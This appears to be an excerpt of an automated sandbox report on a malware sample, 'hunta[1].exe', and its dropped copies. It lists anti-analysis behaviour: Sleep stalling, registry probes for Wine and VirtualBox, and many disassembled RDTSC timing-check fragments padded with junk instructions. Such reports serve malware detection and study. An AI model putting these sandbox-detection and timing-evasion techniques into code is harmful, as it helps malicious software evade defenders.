            Source: C:\Users\user\Desktop\hunta[1].exeStalling execution: Execution stalls by calling Sleepgraph_2-23668
            Source: C:\Users\user\Desktop\hunta[1].exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 113B018 second address: 113B024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11444A7 second address: 11444AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1144604 second address: 114460E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF2E55A2C26h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1144796 second address: 114479C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 114479C second address: 11447A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11447A0 second address: 11447B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FF2E5514DE6h 0x0000000d jnl 00007FF2E5514DE6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 114860C second address: 114862F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FF2E55A2C26h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF2E55A2C34h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 114862F second address: 1148647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1148647 second address: 114864B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 114864B second address: 114866F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jbe 00007FF2E5514DECh 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007FF2E5514DE6h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 114866F second address: 1148675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1148675 second address: 114869D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E5514DF2h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11486F9 second address: 1148703 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF2E55A2C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1148703 second address: 114871F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jmp 00007FF2E5514DEEh 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 114871F second address: 1148723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1148723 second address: 1148740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 and dl, 0000001Bh 0x0000000b push 00000000h 0x0000000d xor dword ptr [ebp+122D1A23h], esi 0x00000013 push 4EE73472h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1148740 second address: 1148744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1148744 second address: 11487AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 4EE734F2h 0x0000000e mov ecx, dword ptr [ebp+122D2ADDh] 0x00000014 push 00000003h 0x00000016 jne 00007FF2E5514DECh 0x0000001c mov esi, dword ptr [ebp+122D2815h] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007FF2E5514DE8h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D23CFh], ebx 0x00000044 push 00000003h 0x00000046 and ecx, 7F146AAAh 0x0000004c push 44534459h 0x00000051 push eax 0x00000052 push edx 0x00000053 push ebx 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 pop ebx 0x00000057 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 114886B second address: 1148870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1148870 second address: 1148876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1148876 second address: 11488F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c and ebx, dword ptr [ebp+122D28A1h] 0x00000012 call 00007FF2E55A2C2Fh 0x00000017 sub dword ptr [ebp+122D1888h], ebx 0x0000001d pop esi 0x0000001e popad 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FF2E55A2C28h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b jmp 00007FF2E55A2C31h 0x00000040 push C06D0BD7h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FF2E55A2C39h 0x0000004c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1148A9F second address: 1148AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF0h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1148AB9 second address: 1148B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 00E98075h 0x0000000d jmp 00007FF2E55A2C34h 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF2E55A2C28h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 sub esi, dword ptr [ebp+122D18BAh] 0x00000036 push 00000003h 0x00000038 mov dword ptr [ebp+122D1A42h], ecx 0x0000003e push 92C0012Ch 0x00000043 pushad 0x00000044 ja 00007FF2E55A2C2Ch 0x0000004a je 00007FF2E55A2C26h 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1132A23 second address: 1132A6C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E5514E12h 0x00000008 jmp 00007FF2E5514DF7h 0x0000000d jmp 00007FF2E5514DF5h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FF2E5514DEEh 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11670EB second address: 116710C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E55A2C30h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116710C second address: 1167112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1167112 second address: 116711F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FF2E55A2C26h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116711F second address: 1167123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1167398 second address: 116739C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116739C second address: 11673B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF2E5514DEEh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1167501 second address: 1167507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1167655 second address: 116767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FF2E5514DECh 0x0000000b jmp 00007FF2E5514DEEh 0x00000010 pop esi 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1167ABD second address: 1167AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF2E55A2C26h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1167EC1 second address: 1167EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1167EDB second address: 1167EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1134565 second address: 1134571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FF2E5514DE6h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116832D second address: 116834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF2E55A2C26h 0x0000000a jp 00007FF2E55A2C26h 0x00000010 popad 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FF2E55A2C2Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116834B second address: 1168352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1168352 second address: 1168357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1168357 second address: 1168370 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007FF2E5514DE6h 0x00000009 js 00007FF2E5514DE6h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jnc 00007FF2E5514DE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11688EF second address: 11688F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1168B7E second address: 1168B84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1168CF7 second address: 1168CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1168CFD second address: 1168D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E5514DF2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1168D18 second address: 1168D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116B422 second address: 116B42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116E9C6 second address: 116E9D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116EB09 second address: 116EB0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116EB0E second address: 116EB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E55A2C26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116EB24 second address: 116EB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DEDh 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116EB36 second address: 116EB3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 116EC38 second address: 116EC51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF2E5514DF1h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1170CD1 second address: 1170CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1170CDE second address: 1170CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1170CE2 second address: 1170CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1170CE6 second address: 1170CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 113E585 second address: 113E58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1139529 second address: 113952D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1174B74 second address: 1174B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1174B8D second address: 1174B9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1174B9D second address: 1174BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C2Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1174BB1 second address: 1174BB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1174BB7 second address: 1174BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1174D1A second address: 1174D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FF2E5514DE6h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1174D26 second address: 1174D5F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FF2E55A2C41h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jnc 00007FF2E55A2C26h 0x0000001d pop ebx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11785CF second address: 11785EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117889D second address: 11788AE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11788AE second address: 11788B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117897D second address: 1178982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1178982 second address: 1178987 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1178987 second address: 1178995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1178B17 second address: 1178B27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117BA2F second address: 117BA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117BA37 second address: 117BA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx esi, ax 0x0000000c push 00000000h 0x0000000e or si, ABC4h 0x00000013 push edx 0x00000014 sub edi, dword ptr [ebp+122D2232h] 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FF2E5514DE8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push eax 0x00000038 jo 00007FF2E5514DEEh 0x0000003e push esi 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117CC1E second address: 117CC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117C293 second address: 117C297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117CC22 second address: 117CC38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117C297 second address: 117C2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117C2A1 second address: 117C2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117C2A5 second address: 117C2B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117D4E8 second address: 117D4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117C2B3 second address: 117C2B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
